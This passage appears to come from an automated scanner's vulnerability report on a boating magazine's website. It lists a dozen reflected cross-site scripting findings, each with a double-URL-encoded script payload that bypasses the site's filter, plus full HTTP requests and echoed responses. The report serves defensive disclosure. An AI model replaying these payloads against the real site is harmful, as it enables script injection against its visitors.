
4.1432. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3faa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef66606158cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3faa"><script>alert(1)</script>f66606158cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /more/digital-publications?c3faa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef66606158cb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/digital-publications?c3faa"><script>alert(1)</script>f66606158cb=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1433. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b8b831275 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbd9c"><script>alert(1)</script>72b8b831275 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /more/the-masters-series?cbd9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b8b831275=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/the-masters-series?cbd9c"><script>alert(1)</script>72b8b831275=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1434. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23200%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22acdd97a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23200"><script>alert(1)</script>22acdd97a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news?23200%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22acdd97a8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news?23200"><script>alert(1)</script>22acdd97a8=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1435. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd689%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3604a112d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd689"><script>alert(1)</script>3604a112d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/coastwise?cd689%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3604a112d5=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/coastwise?cd689"><script>alert(1)</script>3604a112d5=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1436. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d1219e4f8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f10d"><script>alert(1)</script>5d1219e4f8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/dispatches?1f10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d1219e4f8e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/dispatches?1f10d"><script>alert(1)</script>5d1219e4f8e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1437. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc440%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4fc62980f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc440"><script>alert(1)</script>d4fc62980f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home-waters?fc440%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4fc62980f3=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/home-waters?fc440"><script>alert(1)</script>d4fc62980f3=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1438. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e5db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecfbc5b7ba90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e5db"><script>alert(1)</script>cfbc5b7ba90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/mishaps-a-rescues?6e5db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecfbc5b7ba90=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/mishaps-a-rescues?6e5db"><script>alert(1)</script>cfbc5b7ba90=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1439. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e677f804dff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bab04"><script>alert(1)</script>677f804dff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/sailing?bab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e677f804dff5=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/sailing?bab04"><script>alert(1)</script>677f804dff5=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1440. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e3aae6e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f32ed"><script>alert(1)</script>a3e3aae6e23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/todays-top-stories?f32ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e3aae6e23=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/todays-top-stories?f32ed"><script>alert(1)</script>a3e3aae6e23=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1441. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03dbd69e9aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9db0b"><script>alert(1)</script>03dbd69e9aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /resources?9db0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03dbd69e9aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/resources?9db0b"><script>alert(1)</script>03dbd69e9aa=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1442. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1055c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7769fd725aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1055c"><script>alert(1)</script>7769fd725aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-map?1055c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7769fd725aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/site-map?1055c"><script>alert(1)</script>7769fd725aa=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1443. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6761baa2a47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eeb93"><script>alert(1)</script>6761baa2a47 in the application's response.

